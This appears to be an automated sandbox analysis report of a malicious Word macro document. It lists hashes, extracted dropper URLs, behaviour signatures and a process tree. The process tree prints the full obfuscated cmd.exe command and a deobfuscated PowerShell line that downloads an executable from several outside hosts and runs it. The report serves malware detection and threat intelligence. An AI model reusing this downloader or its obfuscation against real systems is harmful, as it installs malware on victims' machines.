Analysis

  • max time kernel
    140s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-08-2024 15:27

General

  • Target

    c918f47fda0745fedaca86195397ace0_JaffaCakes118.doc

  • Size

    248KB

  • MD5

    c918f47fda0745fedaca86195397ace0

  • SHA1

    90367cd9c7d83d6028e0125123541a138c5a82d6

  • SHA256

    7af935b7cd7ddc1383ca817ba41f0784340459331754fcdfa4348fc2a2fe7813

  • SHA512

    894663307c2bc59f31ac3fd5ae6934971dd8b7beebbbcb18de5d020ad43309baf8a1012662c33b195dc1bd3bfcaae45a87e5b5ef396cb58d0e56f0956fb781ac

  • SSDEEP

    3072:BO4ZAi7XnrA+Tj7/tKXYAO+aqjL/xSu90OoiLuDKZXfwKeljR17:BOCA83rA+Tj7lKYMa4xUOmD+XfwLH

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://ttobus.com/ZtzZFiHGL_r

exe.dropper

http://bilanacc.com/P7BuwLoQsTjP0hBVF

exe.dropper

http://gclubfan.com/ahjpTwNsvu2X_Q7h

exe.dropper

http://katariahospital.com/tquLevYG

exe.dropper

http://pjfittedkitchens.com/uerfWET_jrbze

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c918f47fda0745fedaca86195397ace0_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1600
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set gN=xepg'bE-QWi$d3=t1YG/Mzn}(Dwl:4\5~hUZPC{AmIL%76uXf y0Nkj+S;BO)a@TqF_.2sHv,c9oVr&&for %4 in (2,75,26,43,36,34,58,42,41,37,28,32,31,72,16,43,77,43,56,6,56,56,41,59,52,52,39,20,6,28,32,7,29,72,16,43,33,43,63,6,20,36,28,32,7,13,72,16,43,27,27,49,11,54,33,40,12,2,14,4,54,48,69,71,10,69,40,4,57,11,12,48,26,75,54,14,22,1,26,7,75,5,54,1,73,15,49,52,1,15,67,9,1,5,37,27,10,1,22,15,57,11,48,10,10,54,61,14,4,33,15,15,2,28,19,19,15,15,75,5,46,69,67,73,75,40,19,35,15,21,35,65,10,70,18,42,66,77,62,33,15,15,2,28,19,19,5,10,27,61,22,61,73,73,67,73,75,40,19,36,44,58,46,26,42,75,8,69,63,54,36,51,33,58,76,65,62,33,15,15,2,28,19,19,3,73,27,46,5,48,61,22,67,73,75,40,19,61,33,54,2,63,26,52,69,71,46,68,47,66,8,44,33,62,33,15,15,2,28,19,19,53,61,15,61,77,10,61,33,75,69,2,10,15,61,27,67,73,75,40,19,15,64,46,42,1,71,17,18,62,33,15,15,2,28,19,19,2,54,48,10,15,15,1,12,53,10,15,73,33,1,22,69,67,73,75,40,19,46,1,77,48,9,6,63,66,54,77,5,21,1,4,67,56,2,27,10,15,24,4,62,4,60,57,11,64,73,10,73,54,5,54,14,4,15,26,75,64,2,10,4,57,11,64,69,69,48,61,49,14,49,4,74,74,45,4,57,11,33,5,40,26,54,53,10,14,4,71,5,40,10,2,71,26,4,57,11,15,10,22,21,64,14,11,1,22,71,28,15,1,40,2,55,4,30,4,55,11,64,69,69,48,61,55,4,67,1,0,1,4,57,48,75,77,1,61,73,33,24,11,22,10,21,5,26,49,10,22,49,11,48,10,10,54,61,60,38,15,77,50,38,11,12,48,26,75,54,67,25,75,26,22,27,75,61,12,65,10,27,1,24,11,22,10,21,5,26,72,49,11,15,10,22,21,64,60,57,11,26,71,69,48,26,14,4,26,21,10,64,64,22,4,57,41,48,49,24,24,18,1,15,7,41,15,1,40,49,11,15,10,22,21,64,60,67,27,1,22,3,15,33,49,7,3,1,49,29,51,51,51,51,60,49,38,41,22,71,75,53,1,7,41,15,1,40,49,11,15,10,22,21,64,57,11,71,48,15,33,77,15,15,14,4,73,75,75,73,2,10,69,4,57,5,77,1,61,53,57,23,23,73,61,15,73,33,38,23,23,11,61,12,64,10,5,73,14,4,22,27,26,26,10,33,4,57,78)do set WM=!WM!!gN:~%4,1!&&if %4 gtr 77 echo !WM:*WM!=!|%CommonProgramFiles(x86):~23,1%m%ALLUSERSPROFILE:~-4,-3% "
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2476
      • C:\Windows\system32\cmd.exe
        CmD /V:O/C"set gN=xepg'bE-QWi$d3=t1YG/Mzn}(Dwl:4\5~hUZPC{AmIL%76uXf y0Nkj+S;BO)a@TqF_.2sHv,c9oVr&&for %4 in (2,75,26,43,36,34,58,42,41,37,28,32,31,72,16,43,77,43,56,6,56,56,41,59,52,52,39,20,6,28,32,7,29,72,16,43,33,43,63,6,20,36,28,32,7,13,72,16,43,27,27,49,11,54,33,40,12,2,14,4,54,48,69,71,10,69,40,4,57,11,12,48,26,75,54,14,22,1,26,7,75,5,54,1,73,15,49,52,1,15,67,9,1,5,37,27,10,1,22,15,57,11,48,10,10,54,61,14,4,33,15,15,2,28,19,19,15,15,75,5,46,69,67,73,75,40,19,35,15,21,35,65,10,70,18,42,66,77,62,33,15,15,2,28,19,19,5,10,27,61,22,61,73,73,67,73,75,40,19,36,44,58,46,26,42,75,8,69,63,54,36,51,33,58,76,65,62,33,15,15,2,28,19,19,3,73,27,46,5,48,61,22,67,73,75,40,19,61,33,54,2,63,26,52,69,71,46,68,47,66,8,44,33,62,33,15,15,2,28,19,19,53,61,15,61,77,10,61,33,75,69,2,10,15,61,27,67,73,75,40,19,15,64,46,42,1,71,17,18,62,33,15,15,2,28,19,19,2,54,48,10,15,15,1,12,53,10,15,73,33,1,22,69,67,73,75,40,19,46,1,77,48,9,6,63,66,54,77,5,21,1,4,67,56,2,27,10,15,24,4,62,4,60,57,11,64,73,10,73,54,5,54,14,4,15,26,75,64,2,10,4,57,11,64,69,69,48,61,49,14,49,4,74,74,45,4,57,11,33,5,40,26,54,53,10,14,4,71,5,40,10,2,71,26,4,57,11,15,10,22,21,64,14,11,1,22,71,28,15,1,40,2,55,4,30,4,55,11,64,69,69,48,61,55,4,67,1,0,1,4,57,48,75,77,1,61,73,33,24,11,22,10,21,5,26,49,10,22,49,11,48,10,10,54,61,60,38,15,77,50,38,11,12,48,26,75,54,67,25,75,26,22,27,75,61,12,65,10,27,1,24,11,22,10,21,5,26,72,49,11,15,10,22,21,64,60,57,11,26,71,69,48,26,14,4,26,21,10,64,64,22,4,57,41,48,49,24,24,18,1,15,7,41,15,1,40,49,11,15,10,22,21,64,60,67,27,1,22,3,15,33,49,7,3,1,49,29,51,51,51,51,60,49,38,41,22,71,75,53,1,7,41,15,1,40,49,11,15,10,22,21,64,57,11,71,48,15,33,77,15,15,14,4,73,75,75,73,2,10,69,4,57,5,77,1,61,53,57,23,23,73,61,15,73,33,38,23,23,11,61,12,64,10,5,73,14,4,22,27,26,26,10,33,4,57,78)do set WM=!WM!!gN:~%4,1!&&if %4 gtr 77 echo !WM:*WM!=!|CmD "
        3⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:1096
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $jhmdp='jfsvism';$dfwoj=new-object Net.WebClient;$fiija='http://ttobus.com/ZtzZFiHGL_r@http://bilanacc.com/P7BuwLoQsTjP0hBVF@http://gclubfan.com/ahjpTwNsvu2X_Q7h@http://katariahospital.com/tquLevYG@http://pjfittedkitchens.com/uerfWET_jrbze'.Split('@');$qcicjbj='twoqpi';$qssfa = '996';$hbmwjki='vbmipvw';$tinzq=$env:temp+'\'+$qssfa+'.exe';foreach($nizbw in $fiija){try{$dfwoj.DownloadFile($nizbw, $tinzq);$wvsfw='wziqqn';If ((Get-Item $tinzq).length -ge 40000) {Invoke-Item $tinzq;$vfthrtt='coocpis';break;}}catch{}}$adqibc='nlwwih';"
          4⤵
            PID:1156
          • C:\Windows\system32\cmd.exe
            CmD
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2132
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell $jhmdp='jfsvism';$dfwoj=new-object Net.WebClient;$fiija='http://ttobus.com/ZtzZFiHGL_r@http://bilanacc.com/P7BuwLoQsTjP0hBVF@http://gclubfan.com/ahjpTwNsvu2X_Q7h@http://katariahospital.com/tquLevYG@http://pjfittedkitchens.com/uerfWET_jrbze'.Split('@');$qcicjbj='twoqpi';$qssfa = '996';$hbmwjki='vbmipvw';$tinzq=$env:temp+'\'+$qssfa+'.exe';foreach($nizbw in $fiija){try{$dfwoj.DownloadFile($nizbw, $tinzq);$wvsfw='wziqqn';If ((Get-Item $tinzq).length -ge 40000) {Invoke-Item $tinzq;$vfthrtt='coocpis';break;}}catch{}}$adqibc='nlwwih';
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4920

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\996.exe

      Filesize

      367KB

      MD5

      be7bdc847df032d4326e6b4a28217a9a

      SHA1

      b4d88c0cb1aecb2c64e600b80c45c885fd9f1a51

      SHA256

      f295f9e501b8c5fb388d8ba4ae90fbe445bba6e3ace0745ab8db59b4ec9c520d

      SHA512

      3b388dbf826d9b992b8ab2e08e477e5a041825bdaf69db7464076ac7b6eaf8b88ff721e875ba8bbe607a9d3e7bb04dd7d28acb551770fd3aac9b00b5ce2c0d50

    • C:\Users\Admin\AppData\Local\Temp\TCDD3FB.tmp\iso690.xsl

      Filesize

      263KB

      MD5

      ff0e07eff1333cdf9fc2523d323dd654

      SHA1

      77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

      SHA256

      3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

      SHA512

      b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m2dahsek.1vz.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

      Filesize

      1KB

      MD5

      58c8d1a24b6a60e021b00ec988ad29a7

      SHA1

      2eb326f3349cd0a1f150cd3c98306b5988c828b5

      SHA256

      0f1fd7b531c6535de19da1fc1e2504c9410c68a94fcd94523e3c0c7674e0ec78

      SHA512

      ed70562a2f4d412a208431372204e008de1da7524c2a41a2ec8661cd092b806108f5eebd7643e139996e7b7b3d48ad4e2db75bcc86fe07e21b78d955cdc97f9f

    • memory/1600-0-0x00007FF923350000-0x00007FF923360000-memory.dmp

      Filesize

      64KB

    • memory/1600-3-0x00007FF923350000-0x00007FF923360000-memory.dmp

      Filesize

      64KB

    • memory/1600-9-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-6-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-5-0x00007FF923350000-0x00007FF923360000-memory.dmp

      Filesize

      64KB

    • memory/1600-1-0x00007FF96336D000-0x00007FF96336E000-memory.dmp

      Filesize

      4KB

    • memory/1600-2-0x00007FF923350000-0x00007FF923360000-memory.dmp

      Filesize

      64KB

    • memory/1600-12-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-11-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-13-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-14-0x00007FF920A20000-0x00007FF920A30000-memory.dmp

      Filesize

      64KB

    • memory/1600-17-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-19-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-41-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-16-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-15-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-20-0x00007FF920A20000-0x00007FF920A30000-memory.dmp

      Filesize

      64KB

    • memory/1600-32-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-411-0x00007FF923350000-0x00007FF923360000-memory.dmp

      Filesize

      64KB

    • memory/1600-10-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-18-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-42-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-52-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-53-0x00007FF96336D000-0x00007FF96336E000-memory.dmp

      Filesize

      4KB

    • memory/1600-54-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-413-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-8-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-65-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-66-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-7-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-4-0x00007FF923350000-0x00007FF923360000-memory.dmp

      Filesize

      64KB

    • memory/1600-85-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-89-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-40-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1600-410-0x00007FF923350000-0x00007FF923360000-memory.dmp

      Filesize

      64KB

    • memory/1600-409-0x00007FF923350000-0x00007FF923360000-memory.dmp

      Filesize

      64KB

    • memory/1600-412-0x00007FF923350000-0x00007FF923360000-memory.dmp

      Filesize

      64KB

    • memory/1600-33-0x00007FF9632D0000-0x00007FF9634C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4920-55-0x000002327B4D0000-0x000002327B4F2000-memory.dmp

      Filesize

      136KB